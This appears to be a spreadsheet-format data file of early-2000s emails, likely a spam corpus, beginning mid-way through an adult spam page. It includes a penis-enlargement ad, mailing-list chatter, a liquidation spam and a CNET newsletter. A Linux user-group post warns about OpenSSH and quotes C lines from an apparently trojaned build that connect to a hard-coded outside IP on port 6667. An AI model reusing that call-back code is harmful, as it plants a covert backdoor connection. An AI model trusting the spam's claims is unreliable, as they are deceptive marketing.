             src="http://www.jeweldive.com:81/nsi/big/tracy-109.jpg" border="0"&gt;&lt;/font&gt;&lt;/A&gt;&lt;/font&gt;&lt;/TD&gt;
                     &lt;TD&gt;&lt;font face="verdana"&gt;&lt;A
             href="http://www.jeweldive.com:81/nsi/big/natural/bindex.htm"&gt;&lt;FONT
             color=red&gt;&lt;IMG
             src="http://www.jeweldive.com:81/nsi/big/tracy-090.jpg" border="0"&gt;&lt;/font&gt;&lt;/A&gt;&lt;/font&gt;&lt;/TD&gt;
                     &lt;TD&gt;&lt;font face="verdana"&gt;&lt;A
             href="http://www.jeweldive.com:81/nsi/big/natural/bindex.htm"&gt;&lt;FONT
             color=red&gt;&lt;IMG
             src="http://www.jeweldive.com:81/nsi/big/tracy-170.jpg" border="0"&gt;&lt;/font&gt;&lt;/A&gt;&lt;/font&gt;&lt;/TD&gt;
                   &lt;/TR&gt;
                   &lt;TR&gt;
                     &lt;TD&gt;&lt;font face="verdana"&gt;&lt;A
             href="http://www.jeweldive.com:81/nsi/big/natural/bindex.htm"&gt;&lt;FONT
             color=red&gt;&lt;IMG
             src="http://www.jeweldive.com:81/nsi/big/tracy-079.jpg" border="0"&gt;&lt;/font&gt;&lt;/A&gt;&lt;/font&gt;&lt;/TD&gt;
                     &lt;TD&gt;&lt;font face="verdana"&gt;&lt;A
             href="http://www.jeweldive.com:81/nsi/big/natural/bindex.htm"&gt;&lt;FONT
             color=red&gt;&lt;IMG
             src="http://www.jeweldive.com:81/nsi/big/tracy-188.jpg" border="0"&gt;&lt;/font&gt;&lt;/A&gt;&lt;/font&gt;&lt;/TD&gt;
                     &lt;TD&gt;&lt;font face="verdana"&gt;&lt;A
             href="http://www.jeweldive.com:81/nsi/big/natural/bindex.htm"&gt;&lt;FONT
             color=red&gt;&lt;IMG
             src="http://www.jeweldive.com:81/nsi/big/tracy-119.jpg" border="0"&gt;&lt;/font&gt;&lt;/A&gt;&lt;/font&gt;&lt;/TD&gt;
                     &lt;TD&gt;&lt;font face="verdana"&gt;&lt;A
             href="http://www.jeweldive.com:81/nsi/big/natural/bindex.htm"&gt;&lt;FONT
             color=red&gt;&lt;IMG
             src="http://www.jeweldive.com:81/nsi/big/tracy-192.jpg" border="0"&gt;&lt;/font&gt;&lt;/A&gt;&lt;/font&gt;&lt;/TD&gt;
                   &lt;/TR&gt;
                   &lt;TR&gt;
                     &lt;TD&gt;&lt;font face="verdana"&gt;&lt;A
             href="http://www.jeweldive.com:81/nsi/big/natural/bindex.htm"&gt;&lt;FONT
             color=red&gt;&lt;IMG
             src="http://www.jeweldive.com:81/nsi/big/tracy-131.jpg" border="0"&gt;&lt;/font&gt;&lt;/A&gt;&lt;/font&gt;&lt;/TD&gt;
                     &lt;TD&gt;&lt;font face="verdana"&gt;&lt;A
             href="http://www.jeweldive.com:81/nsi/big/natural/bindex.htm"&gt;&lt;FONT
             color=red&gt;&lt;IMG
             src="http://www.jeweldive.com:81/nsi/big/tracy-211.jpg" border="0"&gt;&lt;/font&gt;&lt;/A&gt;&lt;/font&gt;&lt;/TD&gt;
                     &lt;TD&gt;&lt;font face="verdana"&gt;&lt;A
             href="http://www.jeweldive.com:81/nsi/big/natural/bindex.htm"&gt;&lt;FONT
             color=red&gt;&lt;IMG
             src="http://www.jeweldive.com:81/nsi/big/tracy-174.jpg" border="0"&gt;&lt;/font&gt;&lt;/A&gt;&lt;/font&gt;&lt;/TD&gt;
                     &lt;TD&gt;&lt;font face="verdana"&gt;&lt;A
             href="http://www.jeweldive.com:81/nsi/big/natural/bindex.htm"&gt;&lt;FONT
             color=red&gt;&lt;IMG
             src="http://www.jeweldive.com:81/nsi/big/tracy-148.jpg" border="0"&gt;&lt;/font&gt;&lt;/A&gt;&lt;/font&gt;&lt;/TD&gt;
                   &lt;/TR&gt;
                   &lt;/TBODY&gt;
                 &lt;/TABLE&gt;
                 &lt;font face="verdana" size="7"&gt;&lt;B&gt;&lt;A
       onmouseover="window.status='BIGbigS - Nothing but horny amateurs with huge big tits!';return true"
       href="http://www.jeweldive.com:81/nsi/big/natural/bindex.htm"&gt;&lt;FONT
       color=red&gt;MAIN PAGE&lt;/FONT&gt;&lt;/A&gt;&lt;/b&gt;&lt;/font&gt;&lt;font face="verdana"&gt;&lt;B&gt;&lt;BR&gt;
                 &lt;/B&gt;&lt;FONT
       size=3&gt;Huge big titties @ bigbigs.com! &lt;BR&gt;
                 &lt;BR&gt;
                 &lt;FONT size=2&gt;&lt;B&gt;&lt;A
       onmouseover="window.status='BIGbigS - Nothing but horny amateurs with huge big tits!';return true"
       href="http://www.jeweldive.com:81/nsi/big/natural/bindex.htm"&gt;&lt;FONT
       color=red&gt;MORE SAMPLE PICS&lt;/FONT&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;FONT
       color=red&gt;MORE SAMPLE MOVIES&lt;/FONT&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;FONT
       color=red&gt;LIST OF GIRLS&lt;/FONT&gt;&lt;/A&gt; &lt;BR&gt;
                 &lt;/B&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/font&gt;&lt;/FONT&gt;
               &lt;/CENTER&gt;
             &lt;/TD&gt;
           &lt;/TR&gt;
           &lt;/TBODY&gt;
         &lt;/TABLE&gt;
         &lt;p&gt;&amp;nbsp;&lt;/p&gt;
         &lt;p align="left"&gt;&lt;a href="http://www.jeweldive.com:81/herbalo/bpenis/index.html"&gt;&lt;font size="+2"&gt;CLICK
           HERE&lt;/font&gt;&lt;/a&gt;&lt;font size="+2"&gt; to enlarge your PENIS 3-4 inches NATURALLY!!!&lt;/font&gt;&lt;/p&gt;
         &lt;p&gt;&amp;nbsp;&lt;/p&gt;
         &lt;div align="left"&gt;&lt;a href="http://www.jeweldive.com:81/removal/boca/"&gt;Click
           Here&lt;/a&gt; to be removed&lt;/div&gt;
         &lt;p&gt;&lt;font face="verdana"&gt;&lt;BR&gt;
           &lt;BR&gt;
           &lt;BR&gt;
           &lt;BR&gt;
           &lt;BR&gt;
           &lt;BR&gt;
           &lt;BR&gt;
           &lt;/font&gt;&lt;/p&gt;
       &lt;/CENTER&gt;
     &lt;/CENTER&gt;&lt;/CENTER&gt;&lt;/CENTER&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re[2]: So I missed this one...
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello Elias,
 Tuesday, October 1, 2002, 9:54:02 PM, you wrote:
 E&gt; bitbitch@magnesium.net wrote:
 &gt;&gt; Turns out the music industry settled ... quite a hefty
 &gt;&gt; settlement.
 E&gt; Funnky, I thought that it was minor in comparison the the gouging that 
 E&gt; occurs on a standard CD.
 &gt;&gt; The Wall Street Journal
 &gt;&gt; Copyright (c) 2002, Dow Jones &amp; Company, Inc.
 &gt;&gt; Tuesday, October 1, 2002
 &gt;&gt; 
 &gt;&gt; Five Music Concerns To Pay $143.1 Million In Price-Fixing Case
 &gt;&gt; Reuters News Service ...
 &gt;&gt; The companies, which didn't admit any wrongdoing, will pay $67.4
 &gt;&gt; million in cash to compensate consumers who overpaid for CDs between
 &gt;&gt; 1995 and 2000. The companies also agreed to distribute $75.7 million
 &gt;&gt; worth of CDs to public entities and nonprofit organizations throughout
 &gt;&gt; the country.
 E&gt; The CDs will probably cost less than 7.5 million to produce and 
 E&gt; distribute... "didn't admit any wrongdoing"?!? Give me a break.
 E&gt; Elias
 Toobad none of this will go back to any of the people who were forced
 to pay the rates.
 -- 
 Best regards,
  bitbitch                            mailto:bitbitch@magnesium.net
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Something for the person who has everything
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Interesting ebay item......(and no it wasnt me even though the spellingis
 oddly familar)
 http://cgi.ebay.com/aw-cgi/eBayISAPI.dll?MfcISAPICommand=ViewItem&amp;item=1764085998
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Of course, it would require a minimum of EUR300,000 in funding, which is
 &gt; the
 &gt; reason I have not started this project myself... :(
 &gt; 
 &gt; - Matthew
 It would?
 Sounds like you are talking about setting up a company, to be a vendor....
 I'd venture the early days of Debian, Slackware and other involveds there
 was no such financing.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: We BUY Your NEW &amp; USED Magnetic Media or Backup Data Cartridges
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Untitled Document&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#FFFFFF" text="#000000"&gt;
 &lt;table width="648" border="0" cellpadding="0" cellspacing="0" height="688"&gt;
   &lt;tr&gt; 
     &lt;td width="5" height="112"&gt;&lt;/td&gt;
     &lt;td width="641" valign="top"&gt;&lt;b&gt;Thank you in advance for taking the time to 
       review this email. &lt;/b&gt; 
       &lt;p&gt;&lt;font color="#FF0000"&gt;I am not selling anything.&lt;/font&gt; Allow our liquidation 
         service to convert your problem inventory into quick cash. Please contact 
         me right away if you have any of these and/or other data media available. 
         We are a leader in the industry for liquidation and recycling of these 
         materials. Our network of outlets for your &lt;font color="#FF0000"&gt;EXCESS&lt;/font&gt;, 
         &lt;font color="#FF0000"&gt;OVERSTOCKED&lt;/font&gt;, or &lt;font color="#FF0000"&gt;SURPLUS&lt;/font&gt; 
         consumables allows us to provide the maximum amount of residual value 
         for your inventory - NEW and USED.&lt;/p&gt;
     &lt;/td&gt;
     &lt;td width="2"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td height="21" width="5"&gt;&lt;/td&gt;
     &lt;td width="641"&gt;&lt;/td&gt;
     &lt;td width="2"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td height="179" width="5"&gt;&lt;/td&gt;
     &lt;td valign="top" width="641"&gt; 
       &lt;table width="100%" border="0" cellpadding="0" cellspacing="0"&gt;
         &lt;tr&gt; 
           &lt;td width="589" height="179" valign="top"&gt; 
             &lt;table width="100%" border="1" height="193"&gt;
               &lt;tr&gt; 
                 &lt;td width="19%" bgcolor="#FFFFCC"&gt;&lt;font color="#000000"&gt;Product&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="22%"&gt;Brand&lt;/td&gt;
                 &lt;td width="29%" bgcolor="#FFFFCC"&gt;Product&lt;/td&gt;
                 &lt;td width="30%"&gt;Brand&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt; 
                 &lt;td width="19%" bgcolor="#FFFFCC"&gt;&lt;font size="2" color="#000000"&gt;Super 
                   DLT&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="22%"&gt;&lt;font size="2"&gt;Any&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="29%" bgcolor="#FFFFCC"&gt;&lt;font size="2"&gt;9840&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="30%"&gt;&lt;font size="2"&gt;Any&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt; 
                 &lt;td width="19%" bgcolor="#FFFFCC"&gt;&lt;font size="2" color="#000000"&gt;4mm, 
                   150m, 125m &lt;/font&gt;&lt;/td&gt;
                 &lt;td width="22%"&gt;&lt;font size="2"&gt;Any&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="29%" bgcolor="#FFFFCC"&gt;&lt;font size="2"&gt;DC6525&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="30%"&gt;&lt;font size="2"&gt;Any&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt; 
                 &lt;td width="19%" bgcolor="#FFFFCC"&gt;&lt;font size="2" color="#000000"&gt;DLT 
                   IV &lt;/font&gt;&lt;/td&gt;
                 &lt;td width="22%"&gt;&lt;font size="2"&gt;Any&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="29%" bgcolor="#FFFFCC"&gt;&lt;font size="2"&gt;LTO&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="30%"&gt;&lt;font size="2"&gt;Ultrium&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt; 
                 &lt;td width="19%" bgcolor="#FFFFCC"&gt;&lt;font size="2" color="#000000"&gt;4mm, 
                   120m, 90m &lt;/font&gt;&lt;/td&gt;
                 &lt;td width="22%"&gt;&lt;font size="2"&gt;Name brands&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="29%" bgcolor="#FFFFCC"&gt;&lt;font size="2"&gt;DC9250&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="30%"&gt;&lt;font size="2"&gt;Any&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt; 
                 &lt;td width="19%" bgcolor="#FFFFCC"&gt;&lt;font size="2" color="#000000"&gt;DLT 
                   III &amp;amp; XT&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="22%"&gt;&lt;font size="2"&gt;Quantum, Maxell, Fuji&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="29%" bgcolor="#FFFFCC"&gt;&lt;font size="2"&gt;1200' &amp;amp; 2400' 
                   Reel&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="30%"&gt;&lt;font size="2"&gt;Tape any&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt; 
                 &lt;td width="19%" bgcolor="#FFFFCC"&gt;&lt;font size="2" color="#000000"&gt;3570 
                   &lt;/font&gt;&lt;/td&gt;
                 &lt;td width="22%"&gt;&lt;font size="2"&gt;IBM&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="29%" bgcolor="#FFFFCC"&gt;&lt;font size="2"&gt;8mm, 170m, 230m&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="30%"&gt;&lt;font size="2"&gt;AIT w/ chip, Mammoth&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt; 
                 &lt;td width="19%" bgcolor="#FFFFCC"&gt;&lt;font size="2" color="#000000"&gt;DLT 
                   Cleaning Tape &lt;/font&gt;&lt;/td&gt;
                 &lt;td width="22%"&gt;&lt;font size="2"&gt;Any&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="29%" bgcolor="#FFFFCC"&gt;&lt;font size="2"&gt;Optical Media 
                   5.2 GB or higher&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="30%"&gt;&lt;font size="2"&gt;Hewlett Packard, etc.&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt; 
                 &lt;td width="19%" bgcolor="#FFFFCC"&gt;&lt;font size="2" color="#000000"&gt;3590 
                   &lt;/font&gt;&lt;/td&gt;
                 &lt;td width="22%"&gt;&lt;font size="2"&gt;Imation, IBM&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="29%" bgcolor="#FFFFCC"&gt;&lt;font size="2"&gt;8mm, 112m&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="30%"&gt;&lt;font size="2"&gt;Maxell, Sony, Exabyte, Imation&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt; 
                 &lt;td width="19%" bgcolor="#FFFFCC"&gt;&lt;font size="2" color="#000000"&gt;TK70&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="22%"&gt;&lt;font size="2"&gt;Any&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="29%" bgcolor="#FFFFCC"&gt;&lt;font size="2"&gt;Zip &amp;amp; Jaz&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="30%"&gt;&lt;font size="2"&gt;Any&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
     &lt;td width="2"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td height="335" width="5"&gt;&lt;/td&gt;
     &lt;td height="335" width="641"&gt; Your &amp;quot;junk&amp;quot; could turn into cash - 
       We pay for all shipping expenses. Just email your list of supplies to me 
       or any questions you may have, and you'll be contacted right away with a 
       bid. I can email or fax you a copy of our purchasing process to ensure your 
       transaction is handled efficiently and professionally - and that your payment 
       will be prompt and accurate! 
       &lt;p&gt;Thank you again and I look forward to doing business with you in the future. 
       &lt;/p&gt;
       &lt;p&gt;Norm Hutton&lt;br&gt;
       &lt;/p&gt;
       &lt;p&gt;SD Pacific &lt;br&gt;
        If you are interested, please visit our &lt;a href="http://64.251.22.98/sdpacific/smm"&gt;website.&lt;/a&gt;
        &lt;/p&gt;
       &lt;p&gt;&lt;font size="2"&gt;This message is sent in compliance with the new e-mail 
         bill: SECTION 301, Paragraph (a)(2)(C) of s.1618. And also in compliance 
         with the proposed Federal legislation for commercial e-mail (H.R.4176 
         - SECTION 101Paragraph (e)(1)(A)) AND S. 1618 TITLE III SEC. 301. To be 
         removed from our mailing list, simply by replying this email with Subject: Remove. &lt;/font&gt;&lt;/p&gt;
     &lt;/td&gt;
     &lt;td height="335" width="2"&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Openssh FYI.
</t>
  </si>
  <si>
    <t xml:space="preserve">http://docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/freebsd-security
 sa.sin_family=AF_INET;
 sa.sin_port=htons(6667);
 sa.sin_addr.s_addr=inet_addr("203.62.158.32");
 David.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Shopping for an affordable gaming PC? (CNET SHOPPER)
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;head&gt;
 	&lt;title&gt;CNET Shopper Newsletter: Desktops &amp; Notebooks Edition&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#EEEEEE" alink="#0000FF" vlink="#0000FF"&gt;
 &lt;div align="center"&gt;
 &lt;A href="top"&gt;&lt;/A&gt;&lt;!-- header --&gt;
 	&lt;table cellpadding=0 cellspacing=0 border=0 width=612 bgcolor="#ffffff"&gt;
 	&lt;tr valign=top&gt;
 		&lt;td width=442 colspan=4&gt;
 			&lt;img src="http://www.cnet.com/i/nl/sh/hd_desknote.gif" width="442" height="60" border="0" alt="CNET Shopper Newsletter: Desktops &amp; Notebooks Edition"&gt;&lt;br&gt;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&lt;div align="center"&gt;&lt;img src="http://i.i.com.com/cnwk.1d/Ads/common/advertisement.gif" width="120" height="10" border="0"&gt;&lt;/br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ed-jLlvQgV7qkMOZ0rxv3orMjEsaQuR" target="new"&gt;   
 &lt;img src="http://www.techrepublic.com/images/ads/Dell.sky.sweet.gif" width="160" height="600" border="0"&gt;
 &lt;/a&gt;&lt;/div&gt;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href="http://clickthru.online.com/Click?q=02-qia9IljjNkEklL-_XGuwrfzJ6nsR" &gt;Canon PowerShot S40&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 		&lt;td align=right&gt;&lt;FONT face="arial, helvetica" size=-1&gt;2&lt;/td&gt;
 		&lt;td&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;a href="http://clickthru.online.com/Click?q=17-agitI5XQeDiM4KdIz4s1RhjGRsZR" &gt;Canon PowerShot G2&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 		&lt;td align=right&gt;&lt;FONT face="arial, helvetica" size=-1&gt;3&lt;/td&gt;
 		&lt;td&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;a href="http://clickthru.online.com/Click?q=2c-DatOIc0kqhES2DNc-r7MBvWpjudR" &gt;Gateway 600XL&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 		&lt;td align=right&gt;&lt;FONT face="arial, helvetica" size=-1&gt;4&lt;/td&gt;
 		&lt;td&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;a href="hhttp://shopper.cnet.com/shopping/resellers/0-7058426-311-8221154-0.html"&gt;Dell Latitude C400&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 		&lt;td align=right&gt;&lt;FONT face="arial, helvetica" size=-1&gt;5&lt;/td&gt;
 		&lt;td&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;a href="http://clickthru.online.com/Click?q=41-qqJ1IEKzoKGXL8wU5CfCkxHB0FrR" &gt;Cyber Shot DSC-F707&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 &lt;/table&gt; 
 &lt;table border="0" cellpadding="0" cellspacing="0" width="160"&gt;
 	&lt;tr&gt;
 		&lt;td&gt;&lt;a href="http://clickthru.online.com/Click?q=56-NwKYInnwtkMSBcorctPQDwwaMCiR" &gt;&lt;img src="http://www.cnet.com/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt=" " align="absbottom" valign="bottom"&gt;&lt;/a&gt;&amp;nbsp;
 		&lt;a href="http://clickthru.online.com/Click?q=6c-SUL3IuP88_1F8tjKQCL5-NPyEdnR" &gt;&lt;b valign="top" class="m1"&gt;&lt;FONT face="arial, helvetica" size=-1&gt;All most popular&lt;/b&gt;&lt;/a&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 &lt;/table&gt;
 &lt;br&gt;
 						&lt;/font&gt;
 					&lt;/FONT&gt;
 &lt;!-- /Most Popular --&gt;
 &lt;BR&gt;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&lt;img src="http://www.cnet.com/i/sh/nl/desktops_031.gif"&gt;&lt;/td&gt;
 											&lt;/td&gt;
 										&lt;/tr&gt;
 								&lt;/table&gt;
 &lt;!--Prime Feature--&gt;			&lt;table&gt;
 									&lt;TR&gt;
 										&lt;/TD&gt;
 									&lt;/TR&gt;
 									&lt;tr&gt;
 										&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=8&gt;&lt;/td&gt;
 									&lt;/tr&gt;
 									&lt;TR&gt;
 										&lt;TD&gt;
 											&lt;a href="http://clickthru.online.com/Click?q=81-z1IaQ-KpQspSuoLpqfRO9R6BpKcR" &gt;&lt;IMG SRC="http://www.cnet.com/i/co/ps/200/20117910_200_1.gif" BORDER=0&gt;&lt;/A&gt;
 										&lt;/TD&gt;
 										&lt;TD valign=center&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 											&lt;a href="http://clickthru.online.com/Click?q=96-pjdWQtdhd95Ky1sjZWSoS2P4JmRR" &gt;&lt;B&gt;Atlas Micro GS 9800&lt;/B&gt;&lt;/a&gt;&lt;BR&gt;
 											&amp;#149; Pentium 4 2.53 GHz&lt;BR&gt;
 											&amp;#149; 512MB DDR SDRAM&lt;BR&gt;
 											&amp;#149; 40GB hard drive&lt;BR&gt;
 											&amp;#149; CD-RW/DVD-ROM&lt;BR&gt;
 											&amp;#149; 19-inch CRT&lt;BR&gt;
 											&amp;#149; nVidia GeForce4 Ti 4200&lt;BR&gt;
 											&amp;#149; &lt;B&gt;Just &lt;font color="#CC0000"&gt;$2,099&lt;/font&gt;&lt;/B&gt;
 &lt;br&gt;&lt;img src="/b.gif" width="1" height="10" border="0" alt=""&gt;&lt;br&gt;	
 &lt;a href="http://clickthru.online.com/Click?q=ab-ZcQKQYpMbn_dmwyXydit0M-0OvFR" &gt;&lt;img src="http://shopper.cnet.com/i/sh/leaf/checkprices.gif" border=0"&gt;&lt;/a&gt;
 										&lt;/TD&gt;
 									&lt;/TR&gt;
 								&lt;/table&gt;
 								&lt;table cellpadding=0 cellspacing=0 border=0 width=410&gt;
 									&lt;tr colspan=2&gt;
 										&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=4&gt;&lt;/td&gt;
 									&lt;/tr&gt;
 									&lt;tr colspan=2&gt;
 										&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 											&lt;B&gt;Peripherals for your desktop:&lt;/b&gt;
 										&lt;/td&gt;
 									&lt;/tr&gt;
 									&lt;tr&gt;
 										&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 										&lt;a href="http://clickthru.online.com/Click?q=c0-kfs-QWP1IwsjNYa41H99K8FZuS9R" &gt;Canon S900 photo printer&lt;/a&gt;
 										&lt;/td&gt;
 										&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 										&lt;a href="http://clickthru.online.com/Click?q=d5-p-viQzL249jY6E2HCu4jNix1DPuR" &gt;
 Wacom Intuis2 6X8 tablet&lt;/a&gt;
 										&lt;/td&gt;
 									&lt;/tr&gt;
 										&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 										&lt;a href="http://clickthru.online.com/Click?q=eb-HlpoQkDTzhBO2Pcdo6MzbuNK5xFR" &gt;Wireless Keyboard &amp; Mouse&lt;/a&gt; 
 										&lt;/td&gt;
 										&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 										&lt;a href="http://clickthru.online.com/Click?q=00-4FQlI9QDB2CQPHcbgi4cHr7W6T9R" &gt;ViewSonic ViewPanel VP 181&lt;/a&gt; 
 										&lt;/td&gt;
 									&lt;/tr&gt;
 									&lt;tr colspan=2&gt;
 										&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=4&gt;&lt;/td&gt;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1 --&gt;
 							&lt;tr valign="top"&gt;
 								&lt;td width="120"&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=15-mYP_IGcDl2mbnMCAV-hDEc2lRbuR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/co/ps/120/9723300_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=2a-CNuWIrIWzgkGsfNabman8WccrYsR" &gt;&lt;B&gt;Gateway 600XL&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; Pentium 4-M 1.8GHz&lt;BR&gt;
 								&amp;#149; 256MB RAM, 40GB hard drive&lt;BR&gt;
 								&amp;#149; 15.7-inch TFT active matrix&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Starting at &lt;font color="#CC0000"&gt;$2,899&lt;/font&gt;  &lt;/B&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td colspan="2" background="http://www.cnet.com/i/sh/leaf/dots5x7.gif"&gt;&lt;img src="http://www.cnet.com//b.gif" width="409" height="5" alt="" /&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="2"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=5&gt;&lt;/td&gt;
 							&lt;/tr&gt;	
 &lt;!-- Product 2 --&gt;
 							&lt;tr valign="top"&gt;
 								&lt;td width="120"&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=3f-4sAEIqMPaOMsZy7Hcoh57BymNzZR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/co/ps/120/8582529_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;&lt;a href="http://clickthru.online.com/Click?q=54-l6ovIZK3CjTWS-90O9U4lR0vdknR" &gt;&lt;B&gt;Dell Dimension 4000&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; Pentium 4 1.7GHz to 2.53GHz&lt;BR&gt;
 								&amp;#149; 128MB to 1GB&lt;BR&gt;
 								&amp;#149; Up to 120GB hard drive&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Starting at &lt;font color="#CC0000"&gt;$739&lt;/font&gt;    &lt;/B&gt;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href="http://clickthru.online.com/Click?q=69-CY-iIoWOSIRulfPMoAH4OpRzLxrR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/co/ps/120/9777376_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;&lt;a href="http://clickthru.online.com/Click?q=7e-XDXeInp93vEXT_Xi6pURwMpopriR" &gt;&lt;B&gt;Dell Inspiron 2600 series &lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; 1GHz to 1.7GHz&lt;BR&gt;
 								&amp;#149; 128MB to 256MB RAM&lt;BR&gt;
 								&amp;#149; 20GB to 40GB hard drive&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$999&lt;/font&gt; &lt;/B&gt;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href="http://clickthru.online.com/Click?q=93-V4PmQSdrF033nN3cTYjvQ8Rgn5FR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/co/ps/120/6751983_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
